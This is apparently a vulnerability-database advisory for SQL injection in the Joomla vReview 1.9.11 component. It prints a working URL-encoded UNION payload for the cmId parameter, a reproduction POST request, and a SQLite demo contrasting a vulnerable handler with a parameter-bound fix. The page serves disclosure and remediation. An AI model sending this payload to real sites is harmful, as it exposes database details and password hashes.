Joomla vReview 1.9.11 SQL Injection via editReview
Description
Joomla Component vReview 1.9.11 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries through the cmId parameter. An attacker sends a POST request to the editReview task endpoint with a URL-encoded SQL UNION statement in cmId and reads the result out of the response, extracting database information such as the database user, the database name and version, and user names and password hashes stored in the database.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
- Joomla! Component vReview 1.9.11
Patches
- No published patch is referenced by the advisory.
Vulnerability mechanics
Root cause
"Missing input sanitization in the cmId parameter allows SQL injection."
Attack vector
An unauthenticated attacker sends a POST request to `/index.php?option=com_vreview&task=editReview` with a URL-encoded SQL UNION payload in the `cmId` parameter [ref_id=1]. The payload decodes to `1 union select CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())-- -`; `0x203a20` is the byte string ` : `, so the injected row reads as the database user, database name and server version separated by colons, and `-- -` comments out whatever follows `cmId` in the original query. A one-column UNION only succeeds if the original SELECT returns one column, which is what the published payload implies about the affected query. No authentication is required, making this a low-complexity remote attack.
Affected code
The vulnerability resides in the Joomla! Component vReview version 1.9.11. The `cmId` parameter passed to the `editReview` task endpoint is not sanitized before being used in SQL queries, allowing injection of arbitrary SQL statements.
What the fix does
The advisory does not include a published patch. To remediate, the component must validate `cmId` before it reaches SQL: since it is a review id, cast it to an integer and bind it as a query parameter rather than concatenating it into the query text. Escaping alone is not enough for a numeric value that is spliced in without quotes, as the published payload needs no quote character at all. Without a fix, any unauthenticated visitor can inject arbitrary SQL.
Preconditions
- config: The Joomla! vReview component 1.9.11 must be installed and accessible over HTTP.
- auth: No authentication or session is required; the attacker can be unauthenticated.
- network: The attacker must be able to send HTTP POST requests to the target server.
- input: The `cmId` POST parameter is accepted without sanitization.
Reproduction
Send a POST request to `http://TARGET/[PATH]/index.php?option=com_vreview&task=editReview` with body `cmId=1%20union%20select%20CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--%20-`. The response will include the database user, name and version, joined by ` : `, in the output [ref_id=1]. A response that returns only the legitimate review, or a database error, indicates the target is not vulnerable in this form or the original query does not select a single column.
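The following is an added example, not vReview's own code and not the exploit from the reference. It reproduces the pattern the advisory describes (the `cmId` value concatenated into a one-column SELECT) against a constructed in-memory database, runs the UNION payload through it, and shows the hardened handler that rejects the same input. SQLite stands in for MySQL, so the page's `USER()`, `DATABASE()` and `VERSION()` functions are replaced by a dump of a constructed users table, which is the other outcome the description names; the table names, column names and sample rows are assumptions. In Joomla the integer cast and parameter binding would be done with the framework's input filter and database object, but the component's actual code is not on the page.

```python
import sqlite3

# Constructed sample data standing in for the vReview tables; the real
# schema is not published on the page.
SCHEMA = """
CREATE TABLE reviews (id INTEGER PRIMARY KEY, title TEXT);
CREATE TABLE users   (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO reviews VALUES (1, 'Great service');
INSERT INTO reviews VALUES (2, 'Slow delivery');
INSERT INTO users   VALUES (1, 'admin', 'hash-of-admin-password');
"""

# Constructed stand-in for the page's cmId payload
# "1 union select CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())-- -".
# 0x203a20 is the three bytes " : ", so the same separator is kept here;
# SQLite has no USER()/DATABASE()/VERSION(), so the UNION pulls the users
# table instead.  "-- -" comments out the rest of the original query.
PAYLOAD = "1 union select username || ' : ' || password from users-- -"


def open_db():
    """In-memory database populated with the constructed tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def edit_review_vulnerable(conn, cm_id):
    """Reproduces the reported pattern: cmId is spliced into the SQL text.

    The original SELECT must return exactly one column for the page's
    one-column UNION to work, so that is the shape assumed here.
    """
    sql = "SELECT title FROM reviews WHERE id = " + cm_id
    return conn.execute(sql).fetchall()


def edit_review_fixed(conn, cm_id):
    """Hardened form: cmId is a row id, so reject anything that is not an
    integer and bind the value instead of concatenating it into the query."""
    try:
        row_id = int(cm_id)
    except (TypeError, ValueError):
        return []
    return conn.execute(
        "SELECT title FROM reviews WHERE id = ?", (row_id,)
    ).fetchall()


if __name__ == "__main__":
    db = open_db()
    # The vulnerable handler returns the legitimate review plus the injected
    # "admin : hash-of-admin-password" row; the fixed one returns nothing
    # for the payload and the correct row for a plain integer.
    print("vulnerable:", edit_review_vulnerable(db, PAYLOAD))
    print("fixed:     ", edit_review_fixed(db, PAYLOAD))
    print("fixed, id 2:", edit_review_fixed(db, "2"))
```

The integer cast is the whole fix for this parameter: a numeric comparison without quotes cannot be protected by quote escaping, and the published payload contains no quote character to escape. Binding the value as a parameter is what keeps the query safe even if the column type is later changed.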
Generated on Jun 20, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- [1] www.exploit-db.com/exploits/46227 (exploit)
- www.vulncheck.com/advisories/joomla-vreview-sql-injection-via-editreview (third-party advisory)
- wdmtech.com (product)
- extensions.joomla.org/extensions/extension/clients-a-communities/ratings-a-reviews/vreview/ (product)
News mentions
No linked articles in our index yet.